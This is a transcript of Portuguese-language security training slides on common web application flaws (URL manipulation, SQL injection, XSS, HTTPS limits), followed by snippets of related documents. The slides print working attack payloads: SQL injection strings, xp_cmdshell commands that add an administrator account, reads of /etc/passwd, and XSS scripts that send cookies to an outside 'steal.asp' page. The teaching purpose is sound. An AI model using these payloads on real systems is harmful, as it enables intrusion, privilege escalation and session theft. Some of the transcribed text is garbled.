Falhas mais comuns em aplicações web

Tamanho: px
Começar a partir da página:

Download "Falhas mais comuns em aplicações web"

Transcrição

1 Falhas mais comuns em aplicações web Rodrigo Assad, out/2007 1

2 Agenda Introdução Explicando cada ataque através de exemplos URL Manipulation SQL Injection XSS Cross Site Scripting Como resolve-los O que HTTPS nos oferece Porque HTTPS não resolve nossos problemas? Introdução Os ataques a serviços de rede estão se tornando muito sofisticados A criatividade humana não para Mas o que faltava? APLICAÇÕES!!! Mas será que é possível? Atualmente a maioria dos BUG s reportados estão em aplicações Application Security!= Network Security Não se esqueçam: Quem provê acesso aos dados? As aplicações!!! 2

3 Introdução Lendas Urbanas Não ha problemas Até que a aplicação seja comprometida Erros de runtime não são problemas (tratamento de erros) Exponham informações relevantes Consumam todo recurso do servidor Web Services não são vulneráveis Quase nunca testados e raramente segurança é considerada Introdução - Números Gartner 75% dos ataques acontecem no nível das aplicações Em caso de falha no sistema provavelmente os desenvolvedores são três vezes mais culpados do que os administradores de sistemas NIST 92% das vulnerabilidadces estão no nível das aplicações 3

4 Introdução Nosso foco será demonstrar estes BUG s de forma prática Para nos proteger temos que entender das táticas e armas no nosso inimigo Temos que ter nossas armas para nos defender!!! 4

5 Testes e segurança por onde vai. Contexto Não há segurança de sistemas sem a conjuncão de tres fatores Boas praticas de codificação Metodologia adequada (arquitetura e etc) Testes... E ai vem... 5

6 O que é segurança Segurança em um end line Mas o que é isso? Não se discute segurança sem entender de Arquitetura de Computadores, Sistemas Operacionais, Redes de computadores (protocolos de comunicação, Linguagem de programação, engenharia de software e Logica. O que é segurança Entao o que eu preciso saber para se poder testar... Opção 1: seguir os procedimentos definidos alguem que sabe disso tudo Opção 2: Saber disso tudo 6

7 Então para o que querem... Então para o que querem... 7

8 Então para o que querem... Então para o que querem... 8

9 Então para o que querem... Então para o que querem... 9

10 Então para o que querem... Segurança de Redes Recursos Sites 10

11 Segurança de Redes Periódicos Linux Journal Sys Admin Magazine Information Security SC Info Security Magazine Security Magazine (Nacional) Testes 11

12 OSSTMM 12

13 Agora faça seu checklist O que fazer? O que testar? Como fazer? São as resposta que queremos. Vamos começar por... AQUI Em Aplicações WEB 13

14 URL Manipulation O comando GET requisita informações importantes na URL Os parâmetros podem ser manipulados para se obter resultados satisfatórios O impacto é ALTO Variações podem ser feitas para se tentar obter resultados interessantes ebitamount=1 URL Manipulation 14

15 URL Manipulation SQL Injection A idéia é injetar um comando SQL (Structured Query Language) ou comando como imput dos dados em um formulário WEB Todos os parâmetros passados são direcionados para o banco de dados O atacante pode manipular com as tabelas e dados diretamente 15

16 Causas - SQL Injection public void OnLogon(object src, EventArgs e){ SqlConnectioncon = new SqlConnection( "server=(local);database=mydb;uid=sa;pwd;" ); string query = String.Format( "SELECT COUNT(*) FROM Users WHERE " + "username='{0}' AND password='{1}'", txtuser.text, txtpassword.text ); SqlCommand cmd = new SqlCommand(query, con); conn.open(); SqlDataReader reader = cmd.executereader(); try{ if(reader.hasrows()) IssueAuthenticationTicket(); else TryAgain(); } finally{ con.close() } } SQL Injection Problemas Esperado: username: abc password: teste123 Quando submetido a query será montada como: select * from users where username='abc abc' and password = 'test123 test123' Não esperado: username: abc'; -- password: A query enviada para o banco de dados será: select * from users where uname='abc abc ; --' and password='' 16

17 SQL Injection Problemas Esperado: Username: doug Password: SELECT COUNT(*) FROM Users WHERE username='doug doug' and Não esperado: Username: ' OR 1=1 -- Password: SELECT COUNT(*) FROM Users WHERE username='' ' OR 1=1 -- and password='' SQL Injection Site vulnerável Login com Sucesso Usuário Malicioso Esperado Não esperado 17

18 SQL Injection Mais exemplos Identificando campos de uma tabela SELECT fieldlist FROM table WHERE field = 'x' ' AND IS NULL; --'; Verificando se a tabela existe SELECT , passwd, login_id, full_name FROM table WHERE = 'x'' AND 1=(SELECT COUNT(*) FROM tabname); --'; SQL Injection Mais exemplos Procurando por usuários SELECT , passwd, login_id, full_name FROM members WHERE = 'x'' OR full_name LIKE '%Maria Maria%'; Ataques de força bruta SELECT , passwd, login_id, full_name FROM members WHERE = ususario provedor.com' AND passwd = senha senha '; 18

19 SQL Injection Mais exemplos Verificando as permissões no Database SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' DROP TABLE members; --'; Criando um usuário SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' INSERT INTO members (' ',' ','passwd passwd',' ','login_id login_id', 'full_name full_name') VALUES ( ( senha', senha', user user', ', User da Internet');-- --'; SQL Injection Mais exemplos Alterando o mail de comunicação SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' UPDATE members SET = WHERE = 19

20 Caracteres utilizados ' ou " Utilizado para indicar tipo char -- ou # Comentário /* */ Comentário de várias linhas + Adição, concatenação Concatenação % Wildcard?Param1=foo&Param2=bar Parâmetros da URL PRINT Muito utilizado quando não temos Variável Local Variável Global waitfor delay '0:0:10' Delay SQL Injection here=all&sort_mode=delete%20*%20from %20users_uses 20

21 Determinando a versão do SGBD Na maioria do tempo as mensagens de erro nos ajudam a identificar qual o SGBD utilizado As mensagens de erro ODBC mostram SGBD utilizado Se não tivermos as mensagens ODBC Tentamos analisar qual a tecnologia utilizada na aplicação e no servidor WEB Tentamos utilizar caracteres, comandos ou stored procedures que geram erros específicos Determinando a versão do SGBD Concatenat e Strings Null replace Positio n Op Sys interactio n Cast MS SQL T-SQL ' '+' ' Isnull() CHARIND EX xp_cmdsh ell Yes MySQL concat (" ", " ") Ifnull() LOCATE() select into outfile / dumpfile No Access " "&" " Iff(Isnull() ) InStr() #date# No Oracle PL/SQL ' ' ' ' Ifnull() InStr() utf_file No DB2 " "+" " Ifnull() InStr() import from export to Yes Postgres PL/pgSQL ' ' ' ' COALESC E() TEXTPOS( ) Call Yes 21

22 Interagindo com o sistema Operacional Existem duas maneiras de se interagir com o sistema operacional Lendo arquivos Obtendo arquivos de senhas Trocando senhas dos usuários Executando comandos que troquem parâmetros do sistema Execução direta de comandos Não ha limites!!! Qualquer ação depende do privilégio que o usuários utilizado pelo SGBD possui MySQL e a interação O.S. MySQL LOAD_FILE ' union select 1,load_file('/etc/passwd'),1,1,1; LOAD DATA INFILE create table temp( line blob ); load data infile '/etc/passwd' into table temp; select * from temp; SELECT INTO OUTFILE 22

23 MS SQL e a interação O.S. MS SQL Server '; exec master..xp_cmdshell 'ipconfig > test.txt' -- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- '; begin varchar(8000) ; ' ; select ' from tmp where ; as x into temp end -- ' and 1 in (select substring(x,1,256) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp -- Arquitetura mais comum Sempre tenha em mente O SQL normalmente é executado em um outro servidor O servidor de BD normalmente não tem acesso a Internet e é protegido Web Server Application Server Database Server Paginas WEB Validação Da Entrada Execução Do SQL 23

24 Comando de rede relevantes Usando a SP xp_cmdshell podemos executar: Ipconfig /all Tracert myip arp -a nbtstat -c netstat -ano route print Manipulando com as informações da rede '; varchar(256); = ' del test.txt && arp -a >> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt && netstat -ano >> test.txt && route print >> test.txt && tracert -w 10 -h 10 google.com >> test.txt'; EXEC -- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- '; begin varchar(8000) ; ' ; select ' from tmp where ; as x into temp end -- ' and 1 in (select substring(x,1,255) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp -- 24

25 Manipulando com o S.O. Linux MySQL ' union select 1, (load_file('/etc/passwd')),1,1,1; MS SQL Criando usuários '; exec xp_cmdshell 'net user /add victor Pass123'-- '; exec xp_cmdshell 'net localgroup /add administrators victor' -- Iniciando serviços '; exec master..xp_servicecontrol 'start','ftp Publishing' -- Obtendo a senha do VNC '; binary(8) output select as bigint) as x into TEMP-- ' and 1 in (select cast(x as varchar) from temp) -- 25

26 XSS Cross Site Scripting WEB Session Hijaking Não a ligação entre o ID do login e o ID da sessão A sessão do usuário pode ser roubada Impacto é ALTO A idéia e obter de alguma forma o HASH da sessão 26

27 Cross Site Scripting sitehaker.com banco.com Webpage + Cookies Link malicioso em uma pagina web ou malicioso Reflected Code <SCRIPT>Envia o Cookie para attacker.com</script> Executed Malicious Link <SCRIPT>Envia cookie / para ` sitehaker.com User Cookie Cross Site Scripting (XSS) Esta vulnerabilidade tira vantagens de sites que não fazem o tratamento dos dados de entrada. O POST contém um script que pode ser executado via browser <script>window.navigate("http:// somesite.net/steal.asp?cookie=" +document.cookie)</script> 27

28 XSS Como o atacante depura Pode colocar uma mensagem no post <script>alert( this is vulnerable )</script> A aplicação retorna a sua submissão XSS Exemplos Pode se receber um com o um link O resultado é enviado para um site < script>window. navigate("http://badsite.net/st eal.asp?cookie="+document.cooki e)</script> 28

29 XSS Exemplos do passado ert(%22rfdslabs%22)%3c/script%3e ><script>alert(document.cookie)</script> ge2.html?tw=<script>alert( Test );</script> cument.cookie)</script>&frompage=4&page=1&ct=vvt V&mh=0&sh=0&RN=1 arch_exe?search_text=%22%3e%3cscript%3ealert%28 document.cookie%29%3c%2fscript%3e Solução Sempre valide a sessão com login e os parâmetros críticos 29

30 Sistemas distribuídos Sistemas distribuídos podem ser vistos de maneira geral como diferentes elementos de software (aplicações) executando remotamente (ou em locais remotos) e se comunicando para fornecer/consumir serviços. Conjunto de máquinas autônomas Interconectadas por canais de comunicação Comunicando-se por troca de mensagens Independência de falhas (falhas parciais) Ausência de relógio global Ausência de estado global Estado compartilhado da aplicação (através de comunicação) Sistemas distribuídos Além de considerar todos os problemas anteriores Eles se potencializam num cenário distribuído Precisamos usar Comunicação Segura Autenticação Integridade dos dados trafegados Serviços de rede passam a ser problemas : DNS Principalmente. 30

31 Comunicação segura O que podemos usar VPN: IPSec, PPTP,... Custoso Por ser necessário uma configuração especial, a aplicação depende não somente dela mas da rede prover Mas lembre-se A REDE É INSEGURA!!!!! E a aplicação? Autenticação Integridade dos dados trafegados Que tal uma PKI? Temos Autenticação Temos Integridade e confidenciaidade se encriptarmos os dados 31

32 O que HTTPS nos oferece HTTPS resolve os problemas de segurança apontados anteriormente? Mas então para que usar HTTPS? Muitas vezes dizemos que o uso de HTTPS nos temos o servidor seguro O que HTTPS nos oferece HTTPS é a versão segura do protocolo HTTP que implementa a autenticação e encriptação da comunicação. Previne os ataques do tipo men-in-the-middle e que dados interceptados sejam lidos A autenticação é uma característica muito explorada atualmente ICP-BR 32

33 O que HTTPS nos oferece 1. Negocia qual sistema de codificação será usado durante a transferência 2. Estabelece e troca as chaves de sessão entre o cliente e o servidor 3. Opcionalmente autentica o servidor para o cliente 4. Opcionalmente autentica o cliente para o servidor Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica) Identificão da Conexão Randômica (server) Fase do desafio (Mensagem Identificação Randômica) da Conexão Randômica (server) Protocolos de encriptação Protocolos de Encriptação OK Web server End user OK! CA chave pública Chave e certificado público do servidor Se o cliente não tiver a chave pública da CA (recebemos uma mensagem informando O certificado não é valido) Cancel Always Trust Trust this time 33

34 Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Web server Identificão da Conexão Randômica (server) Sessão master Par de chaves simétricas (Encriptado) End user CA chave pública Chave e certificado público do servidor Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Identificão da Conexão Randômica (server) A autenticação do cliente pode começar agora Idenfificão da Conecção Randomica Fase do (server) desafio (Mensagem Randômica Sessão master Leitura Par de chaves simétricas Web server Escrita End user Escrita CA chave pública Chave e certificado Par de chaves público do servidor simétricas Leitura 34

35 Porque HTTPS não resolve nossos problemas? Porque nossos problemas não estão apenas nos protocolos ou na comunicação. Temos problemas nas aplicações e estas hierarquicamente estão acima dos protocolos de comunicação. Autorização Associar direitos, capacidade e habilidades associadas a um assunto A autorização geralmente vem após uma autenticação Ex.: Uma vez que se sabe quem é o usuário foi autenticado o serviço decidirá o que o usuário pode fazer no contexto que ele esta autorizado 35

36 Autorização RBAC Autorização baseada em perfil Autorização baseada em contexto Auditoria Loggin analises Data warehouse Mineração de dados Correlação de eventos 36

37 Próximos passos Componente focado em resolver os problemas apresentados Não intrusivo Flexível Performance Fácil de usar Autenticação Componente para autenticar Login/Senha Certificado Digital Biometria Referências Open-Source Security Testing Methodology Manual Web Application Disassembly with ODBC Error Messages JavaOne 2005 Strategies for Securing Java Technology Code Web Services Security Attacks in Action 9 Ways to Hack a Web App Advanced SQL Injection In SQL Server applications Advanced Cross Site Scripting CROSS-SITE TRACING (XST) SQL Injection Signatures Evasion 37

38 F I M 38

Como testar segurança em aplicações WEB. Rodrigo Assad / Tarciana Katter outubro/2008

Como testar segurança em aplicações WEB. Rodrigo Assad / Tarciana Katter outubro/2008 Como testar segurança em aplicações WEB Rodrigo Assad / Tarciana Katter outubro/2008 Agenda Introdução Explicando cada ataque através de exemplos URL Manipulation SQL Injection XSS Cross Site Scripting

Leia mais

Instituto de Inovação com TIC. [Junho/ 2009]

Instituto de Inovação com TIC. [Junho/ 2009] Instituto de Inovação com TIC [Junho/ 2009] Segurança em aplicações WEB: A nova fronteira rodrigo.assad@cesar.org.br Redes de Computadores (Histórico) Segurança de Redes (Histórico) Robert Tappan

Leia mais

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1 Segurança da Internet Ricardo Terra rterrabh [at] gmail.com Outubro, 2013 2012 1 CV Nome: Ricardo Terra Email: rterrabh [at] gmail.com www: ricardoterra.com.br Twitter: rterrabh Lattes: lattes.cnpq.br/

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas

Leia mais

Boas Práticas de Desenvolvimento Seguro

Boas Práticas de Desenvolvimento Seguro Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO

Leia mais

XSS - CROSS-SITE SCRIPTING

XSS - CROSS-SITE SCRIPTING Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente

Leia mais

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA Sumário Construção de sistema Administrativo... 1 Sistema de Login... 2 SQL INJECTION... 2 Técnicas para Evitar Ataques... 2 Formulário de Login e Senha fará parte do DEFAULT... 5 LOGAR... 5 boas... 6

Leia mais

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de

Leia mais

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com (In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades

Leia mais

Transações Seguras em Bancos de Dados (MySQL)

Transações Seguras em Bancos de Dados (MySQL) Transações Seguras em Bancos de Dados (MySQL) Índice Entendendo os storage engines do MySQL 5 1 As ferramentas 1 Mais algumas coisas que você deve saber 1 Com a mão na massa 2 Mais ferramentas Usando o

Leia mais

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail.

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail. Top Ten OWASP Fausto Levandoski 1 1 Universidade do Vale do Rios dos Sinos (UNISINOS) Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil farole@gmail.com Abstract.

Leia mais

Segurança na WEB Ambiente WEB estático

Segurança na WEB Ambiente WEB estático Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores

Leia mais

Segurança em Web Aula 2

Segurança em Web Aula 2 Open Web Application Security Project Segurança em Web Aula 2 Maycon Maia Vitali ( 0ut0fBound ) maycon@hacknroll.com Hack n Roll Centro Universitário Vila Velha Agenda Revisão da Última Aula SQL Injection

Leia mais

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia. Explorando e tratando a falha de Cross-site-scripting (XSS) 1 D E D E Z E M B R O D E 2 0 1 5 Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS)

Leia mais

Segurança em Aplicações Web Metodologia OWASP

Segurança em Aplicações Web Metodologia OWASP Segurança em Aplicações Web Metodologia OWASP Weekly Seminar Lucas Vinícius da Rosa Laboratório de Segurança em Computação () Universidade Federal de Santa Catarina (UFSC) lvrosa@inf.ufsc.br 2012 Sumário

Leia mais

Introdução à Engenharia da Computação. Banco de Dados Professor Machado

Introdução à Engenharia da Computação. Banco de Dados Professor Machado Introdução à Engenharia da Computação Banco de Dados Professor Machado 1 Sistemas isolados Produção Vendas Compras Banco de Dados Produtos... Banco de Dados Produtos... Banco de Dados Produtos... Desvantagens:

Leia mais

1 SQL Injection A consulta normal SQL seria:

1 SQL Injection A consulta normal SQL seria: HTTP Testando aplicação Web. Pegaremos dois tipos de ataques dentre os top 10 do OWASP 1 SQL Injection A consulta normal SQL seria: SELECT * FROM Users WHERE Username='$username' AND Password='$password'

Leia mais

Aplicação web protegida

Aplicação web protegida Sua aplicação web é segura? SEGURANÇA Aplicação web protegida Aplicações web oferecem grandes riscos à segurança. Aprenda a proteger todos os elementos dessa complexa equação. por Celio de Jesus Santos

Leia mais

GR1NCH/Rêner (gr1nch@dclabs.com)

GR1NCH/Rêner (gr1nch@dclabs.com) GR1NCH/Rêner (gr1nch@dclabs.com) Agenda O que seria um ataque de SQL Injection. As falhas de um administrador. O código ASP vulnerável. O ponto de vista do invasor e as etapas de um ataque: Levantamento

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:

Leia mais

Segurança em Sistemas Web. Addson A. Costa

Segurança em Sistemas Web. Addson A. Costa Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.

Leia mais

Penetration Testing Workshop

Penetration Testing Workshop Penetration Testing Workshop Information Security FCUL 9 Maio 2013 Workshop FCUL Marco Vaz, CISSP, CISA, ISO27001LA, ITILv3 Expert Consultant Partner (mv@integrity.pt) Herman Duarte, OSCP, Associate CISSP,

Leia mais

MySQL. Prof. César Melo. com a ajuda de vários

MySQL. Prof. César Melo. com a ajuda de vários MySQL Prof. César Melo com a ajuda de vários Banco de dados e Sistema de gerenciamento; Um banco de dados é uma coleção de dados. Em um banco de dados relacional, os dados são organizados em tabelas. matricula

Leia mais

SQL Procedural. Josino Rodrigues Neto josinon@gmail.com

SQL Procedural. Josino Rodrigues Neto josinon@gmail.com SQL Procedural Josino Rodrigues Neto josinon@gmail.com SQL Procedural Agregada em SQL-92 As ferramentas têm nomes para suas linguagens SQL procedurais/embutidas Oracle : PL/SQL Postgres PL/Pgsql SQL Server

Leia mais

SQL Linguagem de Definição de Dados. Banco de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri

SQL Linguagem de Definição de Dados. Banco de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri SQL Linguagem de Definição de Dados Banco de Dados SQL Structured Query Language Uma das mais importantes linguagens relacionais (se não a mais importante) Exemplos de SGBD que utilizam SQL Oracle Informix

Leia mais

Ameaças, riscos e vulnerabilidades Cont. Objetivos

Ameaças, riscos e vulnerabilidades Cont. Objetivos Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia

Leia mais

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel

Leia mais

Arquitetura de BDs Distribuídos. Victor Amorim - vhca Pedro Melo pam2

Arquitetura de BDs Distribuídos. Victor Amorim - vhca Pedro Melo pam2 Victor Amorim - vhca Pedro Melo pam2 Arquitetura de BDs Distribuídos Sistemas de bds distribuídos permitem que aplicações acessem dados de bds locais ou remotos. Podem ser Homogêneos ou Heterogêneos: Homogêneos

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos

Leia mais

Recomendações de Segurança para Desenvolvimento de Aplicações Web

Recomendações de Segurança para Desenvolvimento de Aplicações Web Recomendações de Segurança para Desenvolvimento de Aplicações Web Índice 1. INTRODUÇÃO...3 1.1 CONTROLE DE VERSÃO...3 1.2 OBJETIVO...3 1.3 PÚBLICO - ALVO...4 2 VULNERABILIDADES COMUNS...4 2.1 INJEÇÃO DE

Leia mais

INTRODUÇÃO. No entanto, o que pode ser considerado um produto (resultado) da criação de BDs?

INTRODUÇÃO. No entanto, o que pode ser considerado um produto (resultado) da criação de BDs? BANCO DE DADOS Universidade do Estado de Santa Catarina Centro de Ciências Tecnológicas Departamento de Ciência da Computação Prof. Alexandre Veloso de Matos alexandre.matos@udesc.br INTRODUÇÃO Um Banco

Leia mais

JDBC. Java DataBase Connectivity

JDBC. Java DataBase Connectivity JDBC Java DataBase Connectivity JDBC??? Uma API que permite o acesso a virtualmente qualquer fonte de dado tabular a partir de um programa escrito em Java O que é uma uma fonte de dados tabular? acesso

Leia mais

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br Segurança na Web André Tavares da Silva andre.silva@udesc.br Propósito da Segurança A segurança não é usada simplesmente para proteger contra ataques diretos mas é essencial para estabelecer credibilidade/confiança

Leia mais

Gerência de Banco de Dados

Gerência de Banco de Dados exatasfepi.com.br Gerência de Banco de Dados Prof. Msc. André Luís Duarte Banco de Dados Os bancos de dados são coleções de informações que se relacionam para criar um significado dentro de um contexto

Leia mais

Prof. Omero, pág. 63. Banco de Dados InterBase.

Prof. Omero, pág. 63. Banco de Dados InterBase. Prof. Omero, pág. 63 O que é o InterBase? O InterBase é um SGBDR - Sistema Gerenciador de Banco de Dados Cliente/Servidor Relacional 1 que está baseado no padrão SQL ANSI-9, de alta performance, independente

Leia mais

PROCEDIMENTOS ARMAZENADOS (Stored Procedures)

PROCEDIMENTOS ARMAZENADOS (Stored Procedures) PROCEDIMENTOS ARMAZENADOS (Stored Procedures) 1. Introdução Stored Procedure é um conjunto de comandos, ao qual é atribuído um nome. Este conjunto fica armazenado no Banco de Dados e pode ser chamado a

Leia mais

FAPLAN - Faculdade Anhanguera Passo Fundo Gestão da Tecnologia da Informação Banco de Dados II Prof. Eder Pazinatto Stored Procedures Procedimento armazenados dentro do banco de dados Um Stored Procedure

Leia mais

Construindo uma aplicação PHP à Prova de Balas

Construindo uma aplicação PHP à Prova de Balas Construindo uma aplicação PHP à Prova de Balas Rafael Jaques TcheLinux - Porto Alegre - 14/11/09 Buscai primeiro o reino do Senhor e a sua justiça, e todas as demais coisas vos serão acrescentadas (Mateus

Leia mais

13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com

13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com 13-10-2013 Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com Falha segurança Baco PerenBoom Cross-site scripting (XSS) e Logins por canal não seguro

Leia mais

O que são Bancos de Dados?

O que são Bancos de Dados? SQL Básico Liojes de Oliveira Carneiro professor.liojes@gmail.com www.professor-liojes.blogspot.com O que são Bancos de Dados? É o software que armazena, organiza, controla, trata e distribui os dados

Leia mais

PHP e MySQL Autenticação de Usuários

PHP e MySQL Autenticação de Usuários PHP e MySQL Autenticação de Usuários Programação de Servidores Marx Gomes Van der Linden http://marx.vanderlinden.com.br/ Controle de Acesso A maioria das aplicações web envolve em algum ponto um mecanismo

Leia mais

BANCO DE DADOS. info 3º ano. Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br

BANCO DE DADOS. info 3º ano. Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br BANCO DE DADOS info 3º ano Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br Na última aula estudamos Unidade 4 - Projeto Lógico Normalização; Dicionário de Dados. Arquitetura

Leia mais

Programação WEB (JSP + Banco Dados) Eng. Computação Prof. Rodrigo Rocha http://www.materialdeaula.com.br

Programação WEB (JSP + Banco Dados) Eng. Computação Prof. Rodrigo Rocha http://www.materialdeaula.com.br Programação WEB (JSP + Banco Dados) Eng. Computação Prof. Rodrigo Rocha http://www.materialdeaula.com.br JSP (Java Server Pages) - JavaServer Pages (JSP) - Tecnologia de programação serverside - Permite

Leia mais

Acesso a Bancos de Dados (JDBC) Autor: Cleyton Maciel (clayton.maciel@ifrn.edu.br) Adaptação: Pedro Baesse (pedro.baesse@ifrn.edu.

Acesso a Bancos de Dados (JDBC) Autor: Cleyton Maciel (clayton.maciel@ifrn.edu.br) Adaptação: Pedro Baesse (pedro.baesse@ifrn.edu. Acesso a Bancos de Dados (JDBC) Autor: Cleyton Maciel (clayton.maciel@ifrn.edu.br) Adaptação: Pedro Baesse (pedro.baesse@ifrn.edu.br) JDBC Conceito Tipos Transações Tipos SQL e JAVA Conexão JDBC Implementação

Leia mais

BANCO DE DADOS II Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com

BANCO DE DADOS II Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com - Aula 10 - PROCEDIMENTOS ARMAZENADOS - STORED PROCEDURES 1. INTRODUÇÃO Em muitas situações será necessário armazenar procedimentos escritos com a finalidade de se utilizar recursos como loop, estruturas

Leia mais

Curso PHP Aula 08. Bruno Falcão brunogfalcao@gmail.com

Curso PHP Aula 08. Bruno Falcão brunogfalcao@gmail.com + Curso PHP Aula 08 Bruno Falcão brunogfalcao@gmail.com + Roteiro Conectividade com BD SQL + SQL Structured Query Language. Padrão para interagir com banco de dados relacionais. + Banco de dados Um banco

Leia mais

Acesso a Bancos de Dados em Java (JDBC)

Acesso a Bancos de Dados em Java (JDBC) Acesso a Bancos de Dados em Java (JDBC) Jomi Fred Hübner Universidade Regional de Blumenau Departamento de Sistemas e Computação Roteiro Introdução Objetivo da JDBC Vantagens Visão geral do acesso a SGBDs

Leia mais

Construindo uma aplicação PHP à Prova de Balas

Construindo uma aplicação PHP à Prova de Balas Construindo uma aplicação PHP à Prova de Balas Rafael Jaques FISL 11 - Porto Alegre - 24/07/10 Buscai primeiro o reino do Senhor e a sua justiça, e todas as demais coisas vos serão acrescentadas (Mateus

Leia mais

SQL Injection Amplifying Data Leakage OWASP. The OWASP Foundation http://www.owasp.org. Ulisses Castro Security Researcher uss.castro@gmail.

SQL Injection Amplifying Data Leakage OWASP. The OWASP Foundation http://www.owasp.org. Ulisses Castro Security Researcher uss.castro@gmail. SQL Injection Amplifying Data Leakage Ulisses Castro Security Researcher uss.castro@gmail.com Copyright 2007 The Foundation Permission is granted to copy, distribute and/or modify this document under the

Leia mais

BD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04

BD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04 BD SQL Server SGBD SQL Server Licenciatura em Engenharia Informática e Computação Bases de Dados 2003/04 BD SQL Server Criação da Ligação ao SGBD Entrar no Microsoft SQL Server / Enterprise Manager Criar

Leia mais

Autenticação e Autorização

